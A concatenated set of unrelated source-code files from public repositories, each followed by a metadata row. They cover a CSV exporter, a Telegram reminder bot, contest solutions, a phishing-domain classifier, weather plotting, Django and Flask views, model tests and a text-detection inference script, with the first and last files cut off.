# places at the same time :) We are going to build a lookup table that is keyed based on this combination of values.
#Match the rows: we can generate a dict of self.check2.test2s
#and go through the input file one row at a time, storing matches in the out_rows array below.
#We must store to this array in the order the tests were run, not the order they appear in the input file.
test2_dict = {}
for i in range(len(self.check2.test2s)):
test2 = self.check2.test2s[i]
key = test2.child_code + test2.spreadsheet_timestamp
test2_dict[key] = (test2, i)
out_rows = [None] * len(self.check2.test2s)
all_rows = list(reader)
match_count = 0
i = 0
while i < len(all_rows) and match_count < len(self.check2.test2s):
row = all_rows[i]
year = row['year']
month = BackendUtils.pad_num_str(row['month'])
day = BackendUtils.pad_num_str(row['day'])
elapsed_sec = row['Elapsed_Time']
key = Reliability2Parser.get_child_code(row) + '%s %s %s %s' % (day, month, year, elapsed_sec) #row['clock_time_tzadj']
if key in test2_dict:
row[extra_headers[0]] = test2_dict[key][0].child_vocs
row[extra_headers[1]] = BackendUtils.get_word_count(test2_dict[key][0].transcription)
if include_trans:
row[extra_headers[2]] = test2_dict[key][0].transcription
match_count += 1
out_rows[test2_dict[key][1]] = row
if progress_update_fcn:
progress_update_fcn(float(i + 1) / float(len(all_rows)))
i += 1
if progress_next_fcn:
progress_next_fcn()
for i in range(len(out_rows)):
row = out_rows[i]
if row == None:
raise Exception('Unable to match Test2 object with input spreadsheet row. Has spreadsheet changed?')
else:
writer.writerow(row)
if progress_update_fcn:
progress_update_fcn(float(i + 1) / float(len(out_rows)))
## Closes this parser. This just closes all the open files that it is using.
# Calling this method is necessary to ensure that all of the data that was written to the csv file is actually flushed to disk.
# @param self
def close(self):
self.out_file.close()
self.in_file.close()
| babylanguagelab/bll_app | wayne/parsers/reliability2_exporter.py | reliability2_exporter.py | py | 4,456 | python | en | code | 0 | github-code | 90 |
18978100467 | import aioschedule
from aiogram import types, Dispatcher
from config import bot
import asyncio
async def get_chat_id(message: types.Message):
global chat_id
chat_id = message.from_user.id
await message.answer("OK")
async def go_to_sleep():
await bot.send_message(chat_id=chat_id, text="Пора учиться!")
async def scheduler():
aioschedule.every().friday.tuesday.at("20:00").do(go_to_sleep)
while True:
await aioschedule.run_pending()
await asyncio.sleep(2)
def register_handlers_notification(dp: Dispatcher):
dp.register_message_handler(get_chat_id,
lambda word: "go" in word.text) | Juma01/Juma_24-2-BOT | handlers/notification.py | notification.py | py | 675 | python | en | code | 0 | github-code | 90 |
18310151949 | n = int(input())
S = input()
L = []
ans = 0
for i in range(10):
for j in range(10):
for k in range(10):
cnt = 0
iflag = 0
jflag = 0
while True:
if cnt >= n:
break
if iflag == 0 and S[cnt] == str(i):
iflag = 1
cnt += 1
continue
if iflag == 1 and jflag == 0 and S[cnt] == str(j):
jflag= 1
cnt += 1
continue
if jflag == 1 and S[cnt] == str(k):
ans += 1
break
cnt += 1
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02844/s767950651.py | s767950651.py | py | 536 | python | en | code | 0 | github-code | 90 |
20404015516 | import sys
from collections import deque
import heapq
# import itertools
# import math
# import bisect
sys.setrecursionlimit(10**9)
input = sys.stdin.readline
INF = sys.maxsize
N = int(input())
A = []
A_dict = {}
numList = []
for _ in range(N):
A.append(input().rstrip())
for i in range(N):
for j in range(len(A[i])):
if A[i][j] in A_dict:
A_dict[A[i][j]] += 10**(len(A[i])-j-1)
else:
A_dict[A[i][j]] = 10**(len(A[i])-j-1)
for i in A_dict.values():
numList.append(i)
numList.sort(reverse=True)
total = 0
p = 9
for i in numList:
total += p * i
p -= 1
print(total) | taewan2002/ProblemSolving | test/test.py | test.py | py | 629 | python | en | code | 4 | github-code | 90 |
18454274079 | s = int(input())
v = [False] * 1000001
v[s] = True
i = 1
while True:
i += 1
if s % 2 == 0:
s = s // 2
else:
s = 3 * s + 1
if v[s]:
break
else:
v[s] = True
print(i) | Aasthaengg/IBMdataset | Python_codes/p03146/s318427996.py | s318427996.py | py | 223 | python | en | code | 0 | github-code | 90 |
18370518239 | #!/usr/bin/env python3
from collections import Counter
n = int(input())
(*a, ) = map(int, input().split())
c = Counter(a)
b = 0
for i in c.keys():
b ^= i
if sum(a) == 0 or (b == 0 and all(i * 3 == n for i in c.values())):
print("Yes")
elif len(c) == 2 and c.most_common()[0][1] * 3 == 2 * n and c.most_common(
)[1][0] == 0:
print("Yes")
else:
print("No")
| Aasthaengg/IBMdataset | Python_codes/p02975/s548905360.py | s548905360.py | py | 372 | python | en | code | 0 | github-code | 90 |
18410362519 | def main():
N = int(input())
A = [input() for i in range(N)]
ans = 0
ba = 0
b = 0
a = 0
for s in A:
ans += s.count("AB")
if s[0] == "B" and s[-1] == "A":
ba += 1
elif s[0] == "B":
b += 1
elif s[-1] == "A":
a += 1
ans += (ba - 1 if ba > 1 else 0)
if ba > 0 and a > 0 and b > 0:
b += 1
a += 1
ans += min(a, b)
elif ba > 0 and a == 0 and b == 0:
pass
elif ba > 0 and a > 0:
ans += 1
elif ba > 0 and b > 0:
ans += 1
elif ba == 0:
ans += min(a, b)
print(ans)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03049/s900354154.py | s900354154.py | py | 674 | python | en | code | 0 | github-code | 90 |
35827356473 | import os
import pandas as pd
from src.envs.jcsr.ds.coflow import Coflow
from src.envs.jcsr.ds.flow import Flow
class Trace:
"""
Parser for traces of the following format:
Line1 : <Num_Ports> - <Num_Coflows> - <Num_Flows>
Num_Flows lines below: <Flow_id> - <Arrival-time> - <Coflow-id> - <Source> - <Destination> - <Size>
The traces are generated using the flow-generator.py script within the res/traces folder of this repo
"""
def __init__(self, trace_file):
os.path.exists(trace_file)
self.trace_file = trace_file
self.coflows = []
self.flows = []
self.num_flows = 0
self.num_coflows = 0
self.num_ports = 0
self.parse_trace()
def parse_trace(self):
with open(self.trace_file, 'r+') as f:
header = f.readline().rstrip()
header_list = header.split(' ')
self.num_ports = int(header_list[0])
self.num_coflows = int(header_list[1])
self.num_flows = int(header_list[2])
df = pd.read_csv(self.trace_file, skiprows=[0], sep=' ', names=['flow-id', 'arrival-time', 'coflow-id',
'src', 'dest', 'size'])
coflows_df = df.groupby('coflow-id')
for group, frame in coflows_df:
flows_in_coflow = []
coflow_size = 0 # MBs
for row in frame.itertuples(index=False, name=None):
flow = Flow(row[0], row[1], group, row[3], row[4], row[5])
coflow_size += row[5]
flows_in_coflow.append(flow)
self.flows.append(flow)
coflow = Coflow(group, flows_in_coflow[0].arrival_time, coflow_size, flows_in_coflow)
coflow.length = max([flow.size for flow in flows_in_coflow])
coflow.width = len(flows_in_coflow)
self.coflows.append(coflow)
| adnan904/DeepJCSR | src/envs/jcsr/parsers/trace_parser.py | trace_parser.py | py | 1,929 | python | en | code | 0 | github-code | 90 |
36267139263 | from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
import requests
import os
import re
from SentimentAnalysisApi import clean_text
from SentimentAnalyzer.settings import BASE_DIR
''' Import for Image Processsing '''
from SentimentAnalysisUI.util import image_process
''' Import for Audio Processing '''
from SentimentAnalysisUI.util import audio_process
''' Import for Video Processing '''
from SentimentAnalysisUI.util import video_process
API_URL = "http://127.0.0.1:8000/classify/"
process = clean_text.TextPreprocess()
''' Main Methods '''
def index(request):
return render(request, 'index.html')
def textProcess(request):
return render(request, 'text_extract.html')
def imageProcess(request):
return render(request, 'image_extract.html')
def audioProcess(request):
return render(request, 'audio_extract.html')
def videoProcess(request):
return render(request, 'video_extract.html')
''' Sub Methods '''
def analyzeText(request):
try:
if request.method == 'POST':
text = request.POST.get("userText")
# cleaned_text = process.normalizer(text)
params = {'text': text}
response = requests.get(url=API_URL, params=params)
data = response.json()
sentiment = data["text_sentiment"]
except Exception as ex:
print("Exception Occured ", ex)
return render(request,'result.html', {'type': 'text_sentiment', 'given_text': text, 'result': sentiment})
def analyzeImage(request):
if request.method == "POST":
my_uploaded_file = request.FILES['uploaded_img'] # get the uploaded file
fs = FileSystemStorage()
filename = fs.save(my_uploaded_file.name, my_uploaded_file)
uploaded_file_path = fs.path(filename)
imageProcess = image_process.ImageProcess()
imgText = imageProcess.image_to_text(uploaded_file_path)
cleaned_text = process.normalizer(imgText)
output = re.sub(r"[\n\t]*", "", cleaned_text)
output = output.encode('ascii', errors='ignore').decode()
params = {'text': cleaned_text}
response = requests.get(url=API_URL, params=params)
data = response.json()
sentiment = data["text_sentiment"]
return render(request, 'result.html', {'type': 'image_sentiment', 'given_text': imgText, 'result': sentiment})
def analyzeAudio(request):
if request.method == "POST":
my_uploaded_file = request.FILES['uploaded_audio'] # get the uploaded file
fs = FileSystemStorage()
filename = fs.save(my_uploaded_file.name, my_uploaded_file)
uploaded_file_path = fs.path(filename)
audioProcess = audio_process.AudioProcess()
audioText = audioProcess.get_large_audio_transcription(uploaded_file_path)
cleaned_text = process.normalizer(audioText)
output = re.sub(r"[\n\t]*", "", cleaned_text)
output = output.encode('ascii', errors='ignore').decode()
params = {'text': cleaned_text}
response = requests.get(url=API_URL, params=params)
data = response.json()
sentiment = data["text_sentiment"]
return render(request, 'result.html', {'type': 'audio_sentiment', 'given_text': cleaned_text, 'result': sentiment})
def analyzeVideo(request):
if request.method == "POST":
my_uploaded_file = request.FILES['uploaded_video'] # get the uploaded file
choice = request.POST.get("sentiment-choice")
fs = FileSystemStorage()
filename = fs.save(my_uploaded_file.name, my_uploaded_file)
uploaded_file_path = fs.path(filename)
videoProcess = video_process.VideoProcess()
if choice == "text":
frames_path = videoProcess.extract_frames(uploaded_file_path)
extract_text = videoProcess.extract_frame_text(frames_path)
elif choice == "audio":
audioPath = videoProcess.video_to_audio(uploaded_file_path)
audioProcess = audio_process.AudioProcess()
extract_text = audioProcess.get_large_audio_transcription(audioPath)
cleaned_text = process.normalizer(extract_text)
else:
print("invalid")
params = {'text': cleaned_text}
response = requests.get(url=API_URL, params=params)
data = response.json()
sentiment = data["text_sentiment"]
return render(request, 'result.html', {'type': 'video_sentiment', 'given_text': extract_text, 'result': sentiment})
| sprao-cs/SentimentAnalyzer-Django-Scikit-Learn | SentimentAnalyzer/SentimentAnalysisUI/views.py | views.py | py | 4,600 | python | en | code | 2 | github-code | 90 |
28368099455 | import csv
import sys
typename = str(sys.argv[1])
gsl_path = "../GSL_isol/"
final_dataset_file = '../' + typename + '_dataset.csv'
open(final_dataset_file,'w').close()
with open(final_dataset_file, "a") as datf:
csvwriter = csv.writer(datf, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
readname = '../' + typename + '_unique.csv'
with open(readname,'r') as csvf:
csvreader = csv.reader(csvf, delimiter=",")
headers = next(csvreader, None)
print(headers)
for row in csvreader:
if len(row) == 0: continue
word_id = 0
for video_path in row:
if video_path == '':
word_id += 1
continue
pathlist = [video_path,str(word_id)]
csvwriter.writerow(pathlist)
word_id += 1 | george22294/Sign_language_recognition | code/tested_on_ubuntu/2_create_dataset.py | 2_create_dataset.py | py | 859 | python | en | code | 0 | github-code | 90 |
19821071070 | """Generic Plotting Functions"""
import os
import matplotlib as mpl
import boto3
from pyleecan.Classes.MachineUD import MachineUD
from pylee_ext.main import expand_pylee_classes, get_pylee_machine
from utils.global_functions import convert_dict_to_floats, setup_input
def create_axial_slice(machine_dict):
"""
Checks if machine input is valid and generates 2D axial view of machine
Parameters
----------
machine_dict: dict
Machine Input from Frontend
Returns
-------
img_dict: dict
Contains S3 image location, validity of machine dimensions, error msg (optional)
"""
expand_pylee_classes()
convert_dict_to_floats(machine_dict)
setup_input(machine_dict)
machine = get_pylee_machine(machine_dict)
machine = machine.json_to_pyleecan(machine_dict)
#Convert user input to pyleecan format
# machine_dict = json.load(os.path.join('Debug', 'machine.json'))
# material_db = get_material_db(os.path.join(lptn_root, "Input", "Material"))
# machine = json_to_pyleecan(machine_dict, material_db)
#Check machine
valid_machine = True
try:
if isinstance(machine, MachineUD):
machine.check(machine_dict)
else:
machine.check()
except Exception as err:
valid_machine = False
err_msg = str(err)
#Plot machine
os.makedirs('temp', exist_ok=True)
img_path = os.path.join('temp', 'MachinePlot.png')
machine.plot(save_path=img_path, is_show_fig=False)
#Upload image to S3
bucket = os.environ["BUCKET_NAME"]
id = machine_dict['id']
s3_img_path = f"s3://{bucket}/{id}/MachinePlot.png"
s3 = boto3.resource('s3')
s3.meta.client.upload_file(img_path, f"{bucket}", f"{id}/MachinePlot.png")
#Delete Local Plot
if os.path.exists(img_path):
os.remove(img_path)
img_dict = {
"valid_machine": valid_machine,
"img_loc": s3_img_path
}
if not valid_machine:
img_dict["error"] = err_msg
return img_dict
def get_temp_color(t, t_min=0.0, t_max=100.0, cmap='jet'):
"""
Normalises t for range t_max-t_min and converts it to RGBA color for plotting.
Parameters
----------
t: float
t_min: float
t_max:float
cmap: str
matplotlib colormap
Returns
-------
temp_map: rgba tuple
"""
temp_map = mpl.cm.get_cmap(cmap)
if t < t_min:
raise ValueError("Current temperature is below minimum temperature")
if t > t_max:
raise ValueError("Current temperature is above maximum temperature")
t_norm = (t-t_min)/(t_max-t_min)
return temp_map(t_norm) | janzencalma20/django-backend | utils/plot.py | plot.py | py | 2,649 | python | en | code | 0 | github-code | 90 |
26965501327 | from flask.views import MethodView
from biweeklybudget import settings
from biweeklybudget.utils import dtnow
from biweeklybudget.flaskapp.app import app
class DateTestJS(MethodView):
"""
Handle GET /utils/datetest.js endpoint.
"""
def get(self):
if settings.BIWEEKLYBUDGET_TEST_TIMESTAMP is None:
return 'var BIWEEKLYBUDGET_DEFAULT_DATE = new Date();'
dt = dtnow()
return 'var BIWEEKLYBUDGET_DEFAULT_DATE = new Date(%s, %s, %s);' % (
dt.year, (dt.month - 1), dt.day
)
def set_url_rules(a):
a.add_url_rule(
'/utils/datetest.js',
view_func=DateTestJS.as_view('date_test_js')
)
set_url_rules(app)
| jantman/biweeklybudget | biweeklybudget/flaskapp/views/utils.py | utils.py | py | 698 | python | en | code | 87 | github-code | 90 |
11064117628 | """Message model tests"""
import os
from unittest import TestCase
from models import db, User, Message, Follows, Likes
os.environ['DATABASE_URL'] = "postgresql:///warbler-test"
from app import app
db.create_all()
# Data for creating test users
USER_1_DATA = {
"email": "test@test.com",
"username": "test1user",
"password": "HASHED_PASSWORD"
}
USER_2_DATA = {
"email": "test2@test.com",
"username": "test2user",
"password": "HASHED_PASSWORD"
}
class MessageModelTestCase(TestCase):
"""Test message model."""
def setUp(self):
"""Clear any errors, clear tables, create test client."""
db.session.rollback()
User.query.delete()
Message.query.delete()
Follows.query.delete()
Message.query.delete()
self.client = app.test_client()
def test_message_model(self):
"""Does the basic model work?"""
u = User(**USER_1_DATA)
db.session.add(u)
db.session.commit()
m = Message(text="Test message", user_id=u.id)
db.session.add(m)
db.session.commit()
self.assertEqual(m.text, "Test message")
self.assertEqual(m.user_id, u.id)
self.assertEqual(m.user, u)
self.assertTrue(m.timestamp)
self.assertTrue(m.id)
def test_message_like(self):
"""Test one user liking another user's message"""
u1 = User(**USER_1_DATA)
u2 = User(**USER_2_DATA)
db.session.add_all([u1, u2])
db.session.commit()
m = Message(text="Test message", user_id=u1.id)
u2.likes.append(m)
db.session.commit()
likes = Likes.query.all()
self.assertIn(m, u2.likes)
self.assertEqual(len(likes), 1)
self.assertEqual(likes[0].user_id, u2.id)
self.assertEqual(likes[0].message_id, m.id)
self.assertIn(u2, m.liked_by)
self.assertNotIn(u1, m.liked_by)
def test_message_unlike(self):
"""Test that removing message from user's likes removes the Like"""
u1 = User(**USER_1_DATA)
u2 = User(**USER_2_DATA)
db.session.add_all([u1, u2])
db.session.commit()
m = Message(text="Test message", user_id=u1.id)
u2.likes.append(m)
db.session.commit()
# The above tested to show message liked by u2; now remove and test
u2.likes.remove(m)
db.session.commit()
likes = Likes.query.all()
self.assertNotIn(m, u2.likes)
self.assertEqual(len(likes), 0)
self.assertNotIn(u2, m.liked_by)
| lauramoon/warbler | test_message_model.py | test_message_model.py | py | 2,563 | python | en | code | 0 | github-code | 90 |
15048685577 | '''
NOTE: The global keywords are only placed there because I like to analyze my variables individually in the Variable Explorer.
The Variable Explorer is available for IDEs like Spyder, Pycharm etc. I use Spyder.
So you can totally remove them (the lines with the global keywords) if you do not need that. The program will still run and print your accuracy to you.
'''
import pandas as pd
'''
This is the Function that does the Magic (Preciction/Classification)
To use the Function: phishing_domain_detector(Name of Dataset file in csv format) as seen on line 49.
'''
def phishing_domain_detector(file=""):
# Load the Data
data = pd.read_csv(file)
# Split Data into X and Y
global X, Y
X = data.iloc[:,:-1]
Y = data.iloc[:,-1]
# Split data into Training and Testing Data.
from sklearn.model_selection import train_test_split
global x_train, x_test, y_train, y_test
x_train, x_test, y_train, y_test = \
train_test_split(X,Y, test_size=0.3, random_state=1234)
# Perform Decision Tree classsification
from sklearn import tree
global dtree
dtree = tree.DecisionTreeClassifier()
# Handling Exceptions
try:
dtree.fit(x_train, y_train)
except Exception: # This is for When the Data isn't properly Labeled.
print("[-] Please Ensure your data is properly Labeled\n[-] Exiting...")
import sys
sys.exit() # Exit the Program if Data isn't properly Labeled.
else:
prediction = dtree.predict(x_test)
# Measure our accuracy
from sklearn.metrics import accuracy_score
global accuracy
accuracy = accuracy_score(prediction, y_test) * 100
print("Accuracy is", accuracy)
phishing_domain_detector("Training Dataset.csv")
| Muhammad-aa/Phishing-Domain-Detection | Phishing Domain Detector.py | Phishing Domain Detector.py | py | 1,843 | python | en | code | 3 | github-code | 90 |
36070112831 | """
*Script plots March 2012 200mb winds and height fields.
Data for March 2010 is also available for plotting*
"""
import best_NCEPreanalysis_synop_datareader as N #function reads in data from NCEP
import numpy as np
from scipy.stats import nanmean
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, interp
### Call NCEP Functions
u12,level,latitude,longitude = N.wind('u',2012)
v12,level,latitude,longitude = N.wind('v',2012)
hgts12,level,latitude,longitude = N.hgt(2012)
#temp12,level,latitude,longitude = N.temp(2012)
#u10,level1,latitude1,longitude1 = N.wind20('u',1910)
#v10,level1,latitude1,longitude1 = N.wind20('v',1910)
#hgts10,level,latitude1,longitude1 = N.hgt20(1910)
#lftx,latitude,longitude = N.lftx(2012)
#mhgts,levelmh,latitudemh,longitudemh = N.climo('hgt')
#slp12,latitude,longitude = N.MSLP(2012)
lonq = np.where((longitude > 180) & (longitude < 305))
lonq = np.squeeze(lonq)
lon = longitude[lonq]
latq = np.where((latitude > 20) & (latitude < 65))
latq = np.squeeze(latq)
lat = latitude[latq]
#lonq1 = np.where((longitude1 > 180) & (longitude1 < 305))
#lonq1 = np.squeeze(lonq1)
#lon1 = longitude1[lonq1]
#latq1 = np.where((latitude1 > 20) & (latitude1 < 65))
#latq1 = np.squeeze(latq1)
#lat1 = latitude1[latq1]
lons,lats = np.meshgrid(lon,lat)
#lon1,lat1 = np.meshgrid(lon1,lat1)
### Restrict Domain Over United States
u12 = u12[:,9,latq,73:122]
v12 = v12[:,9,latq,73:122]
hgt12 = hgts12[:,9,latq,73:122]
#temp12 = temp12[:,0,latq,73:122]
#u10 = u10[:,16,latq1,91:153]
#v10 = v10[:,16,latq1,91:153]
#hgt10 = hgts10[:,16,latq1,91:153]
#lftx = lftx[:,latq,93:122]
#mhgts12 = mhgts[84,9,latq,73:122]
#mhgts10 = mhgts[84,9,latq,73:122]
#slp12 = slp12[:,latq,73:122]
### Calculate Mean SLP Proceeding 20 days
#slpq = []
#for doy in xrange(71,86):
# slpn = slp12[doy,:,:]
# slpq.append(slpn)
#slpq = np.asarray(slpq)
#aveslp = nanmean(slpq)
#slp_mean = aveslp/100.
#
#slp_mean[np.where(slp_mean < 970.)] = 970.
#slp_mean[np.where(slp_mean > 1041.)] = 1041.
###Calculate Mean Winds
uq12 = []
for doy in xrange(83,86):
un12 = u12[doy,:,:]
uq12.append(un12)
uq12 = np.asarray(uq12)
aveu12 = nanmean(uq12)
#uq10 = []
#for doy in xrange(76,88):
# un10 = u10[doy,:,:]
# uq10.append(un10)
#uq10 = np.asarray(uq10)
#aveu10 = nanmean(uq10)
vq12 = []
for doy in xrange(83,86):
vn12 = v12[doy,:,:]
vq12.append(vn12)
vq12 = np.asarray(vq12)
avev12 = nanmean(vq12)
#vq10 = []
#for doy in xrange(76,88):
# vn10 = v10[doy,:,:]
# vq10.append(vn10)
#vq10 = np.asarray(vq10)
#avev10 = nanmean(vq10)
### Calculate Mean Geopotential Heights Proceeding 20 Days
hgtq12 = []
for doy in xrange(83,86):
hgtn12 = hgt12[doy,:,:]
hgtq12.append(hgtn12)
hgtq12 = np.asarray(hgtq12)
avehgts12 = nanmean(hgtq12)
#hgtq10 = []
#for doy in xrange(76,88):
# hgtn10 = hgt10[doy,:,:]
# hgtq10.append(hgtn10)
#hgtq10 = np.asarray(hgtq10)
#avehgts10 = nanmean(hgtq10)
### Calculate Geopotential Height Anomaly
#hgt12 = hgt12[75,:,:]
#ahgt12 = hgt12 - avehgts12
#
#hgt10 = hgt10[84,:,:]
#ahgt10 = hgt10 - avehgts10
#### Daily Values for a particular level
#u = u[67,0,:,:]
#v = v[67,0,:,:]
#lftx = lftx[67,:,:]
### Basemap Plot SLP for March 1910 and 2012
#m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
# urcrnrlat=61,resolution='l')
#m.drawstates()
#m.drawcountries()
#m.drawmapboundary(fill_color = 'white')
#m.drawcoastlines(color='black',linewidth=0.5)
#m.drawlsmask(land_color='grey',ocean_color='w')
#x,y = m(lon,lat)
#cs = m.contour(x,y,slp_mean,11,colors='k')
#cs1 = m.contourf(x,y,slp_mean,np.arange(970,1041,1))
#cbar = m.colorbar(cs1,location='bottom',pad='5%',ticks=[np.arange(970,1041,5)])
#cbar.set_label('Pressure (hPa)')
#plt.title('10-25 March 2012, Sea Level Pressure',fontsize=20)
#directory = '/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/'
#plt.savefig(directory + 'meanslp.2012.png',dpi=200)
#plt.show()
#### Basemap Plot Heights
#m = Basemap(projection='merc',llcrnrlon=235,llcrnrlat=25,urcrnrlon=300,
# urcrnrlat=54,resolution='l')
#m.drawstates()
#m.drawcountries()
#m.drawmapboundary(fill_color = 'white')
#m.drawcoastlines(color='black',linewidth=0.5)
#m.drawlsmask(land_color='grey',ocean_color='w')
#x,y = m(lon,lat)
#cs = m.contour(x,y,ahgt,15,colors='k')
#cs1 = m.contourf(x,y,ahgt,range(-450,600,2))
#cs = m.barbs(x,y,u,v,15)
#cbar = m.colorbar(cs1,location='bottom',pad='5%')
#cbar.set_label('Meters')
#plt.title('Geopotential Height (250mb) Trend (20 days) March 13, 2012')
#
#directory = '/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/'
#plt.savefig(directory + '2012.hgttrend.march.007.png',dpi=300)
#plt.show()
speed12 = np.sqrt(aveu12**2+avev12**2)
#speed10 = np.sqrt(aveu10**2+avev10**2)
speed12[np.where(speed12 <25)] = np.nan
#speed10[np.where(speed10 <25)] = np.nan
time = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20']
days = list(xrange(60,81))
### Create Figure
#for i in xrange(len(time)):
# fig = plt.figure()
# us12 = u12[days[i]]
# vs12 = v12[days[i]]
# speeds12 = speed12[days[i]]
# speeds12[np.where(speeds12<25)]=25
# speeds12[np.where(speeds12>55)]=55
# hgtss12 = hgt12[days[i]]
# #fig.suptitle('200 mb Daily Mean Winds and Heights',fontsize=16)
# ### Panel 1
# #ax1 = fig.add_subplot(211)
# m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
# urcrnrlat=61,resolution='l')
# m.drawstates()
# m.drawcountries()
# m.drawmapboundary(fill_color = 'white')
# m.drawcoastlines(color='black',linewidth=0.5)
# m.drawlsmask(land_color='grey',ocean_color='w')
# x,y = m(lons,lats)
# cs2 = m.contourf(x,y,speeds12,range(25,56,1))
# cs1 = m.contour(x,y,hgtss12,20,colors='r',linewidth=1,linestyles='dashed')
# cs = m.quiver(x[::2,::2],y[::2,::2],us12[::2,::2],vs12[::2,::2],scale=450)
# cbar = m.colorbar(cs2,location='bottom',pad='5%',ticks=(xrange(25,61,5)))
# cbar.set_label('Knots')
# plt.title('March %s, 2012, 200 mb Daily Mean Winds and Heights' % time[i],fontsize=16)
# plt.savefig('/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/2012winds.%d.png' % i,dpi=300)
### Panels for March 2012
fig=plt.figure()
fig.suptitle('200mb Zonal Mean Wind and Geopotential Height',fontsize=16)
ax1 = fig.add_subplot(211)
m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
urcrnrlat=61,resolution='l')
m.drawstates()
m.drawcountries()
m.drawmapboundary(fill_color = 'white')
m.drawcoastlines(color='black',linewidth=0.5)
m.drawlsmask(land_color='grey',ocean_color='w')
x,y = m(lons,lats)
cs2 = m.contourf(x,y,speed12,range(25,61,1))
cs2.set_cmap('jet')
cs = m.quiver(x[::2,::2],y[::2,::2],aveu12[::2,::2],avev12[::2,::2],scale=450,color='darkred')
cbar = m.colorbar(cs2,location='right',pad='5%',ticks=list(xrange(25,61,5)))
cbar.set_label('Knots')
plt.title('March 23-26, 2012')
ax1 = fig.add_subplot(212)
m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
urcrnrlat=61,resolution='l')
m.drawstates()
m.drawcountries()
m.drawmapboundary(fill_color = 'white')
m.drawcoastlines(color='black',linewidth=0.5)
m.drawlsmask(land_color='grey',ocean_color='w')
cs2 = m.contour(x,y,avehgts12,range(11000,12500,100),linestyles='dashed',linewidth=1,colors='k')
cs1 = m.contourf(x,y,avehgts12,range(11000,12500,50))
cs1.set_cmap('jet')
cbar1 = m.colorbar(cs1,location='right',pad='5%',ticks=range(11000,12600,200))
cbar1.set_label('Meters')
cbar.set_label('Knots')
plt.subplots_adjust(wspace=0.1)
plt.savefig('/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/march2012_1910_ncep.eps',dpi=400,format='eps') | zmlabe/EarlySpringOnset | Scripts/best_NCEPreanalysis_March2012_plots.py | best_NCEPreanalysis_March2012_plots.py | py | 7,812 | python | en | code | 3 | github-code | 90 |
1893396678 | from django.contrib.auth import get_user_model
from apps.order.models import Order,OrderItem
from apps.cart.cart import Cart
from .models import Product,WishList
User=get_user_model()
def checkout(request,username,email,address):
cart=Cart(request)
order=Order.objects.create(user=User.objects.filter(email=email)[0],email=email,address=address)
order.save()
for item in cart:
OrderItem.objects.create(order=order,product=Product.objects.get(id=item["product_id"]),quantity=item["quantity"],price=item["price"])
return order.id
def wishlist(product_id,quantity,user):
try:
WishList.objects.update_or_create(user=user,product=Product.objects.get(id=product_id),quantity=quantity)
return True
except Exception as e:
return e
| lawrenceuchenye/ecommerce | apps/store/utils.py | utils.py | py | 753 | python | en | code | 0 | github-code | 90 |
29402993641 | import turtle
import math
t = turtle.Turtle()
t.pencolor('red')
#Khai báo các hàm
def chuyen_do_C(do_f):
return (do_f - 32) / 1.8
def hinh_vuong(a):
for i in range(4):
t.fd(a)
t.rt(90)
def da_giac_deu(n, width):
angle = (n-2) * 180 / n
for i in range(n):
t.fd(width)
t.rt(180 - angle)
def dien_tich():
'Hàm tính diện tích hình tròn'
return math.pi * r * r
def hinh_tron(r):
t.hideturtle()
t.pencolor('green')
t.circle(r)
r = float(input('Nhập vào bán kính: '))
a = dien_tich()
print(f'Diện tích của hình tròn có bán kính = {r} là: {a}')
c = chuyen_do_C(100)
print(c)
hinh_vuong(100)
t.penup()
t.goto (200, 200)
t.pendown()
da_giac_deu(6, 100)
hinh_tron(r)
turtle.done()
| VuLong160396/Day11 | Thuc_hanh_hinh_vuong.py | Thuc_hanh_hinh_vuong.py | py | 764 | python | vi | code | 0 | github-code | 90 |
7817416898 | # coding: utf-8
import warnings
import os
import cv2
import six
from PIL import Image
import matplotlib.pyplot as plt
import mmcv
import numpy as np
import pycocotools.mask as maskUtils
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmdet.core import wrap_fp16_model
from mmdet.core import get_classes
from mmdet.datasets.pipelines import Compose
from mmdet.models import build_detector
import matplotlib.pyplot as plt
def init_detector(config, checkpoint=None, device='cuda:0'):
if isinstance(config, str):
config = mmcv.Config.fromfile(config)
elif not isinstance(config, mmcv.Config):
raise TypeError('config must be a filename or Config object, '
'but got {}'.format(type(config)))
config.model.pretrained = None
model = build_detector(config.model, test_cfg=config.test_cfg)
if checkpoint is not None:
checkpoint = load_checkpoint(model, checkpoint)
if 'CLASSES' in checkpoint['meta']:
model.CLASSES = checkpoint['meta']['CLASSES']
else:
warnings.warn('Class names are not saved in the checkpoint\'s '
'meta data, use COCO classes by default.')
model.CLASSES = get_classes('coco')
model.cfg = config # save the config in the model for convenience
model.to(device)
model.eval()
return model
class LoadImage(object):
def __call__(self, results):
if isinstance(results['img'], str):
results['filename'] = results['img']
else:
results['filename'] = None
img = mmcv.imread(results['img'])
results['img'] = img
results['img_shape'] = img.shape
results['ori_shape'] = img.shape
return results
def inference_detector(model, img):
"""Inference image(s) with the detector.
Args:
model (nn.Module): The loaded detector.
imgs (str/ndarray or list[str/ndarray]): Either image files or loaded
images.
Returns:
If imgs is a str, a generator will be returned, otherwise return the
detection results directly.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# build the data pipeline
test_pipeline = [LoadImage()] + cfg.data.test.pipeline[1:]
test_pipeline = Compose(test_pipeline)
# prepare data
data = dict(img=img)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
return result, data['img_meta'][0][0]['scale_factor']
def predict():
config_file = 'configs/psenet_r50.py'
checkpoint_file = 'work_dirs/psenet_r50/epoch_100.pth'
# 100张自标注测试集
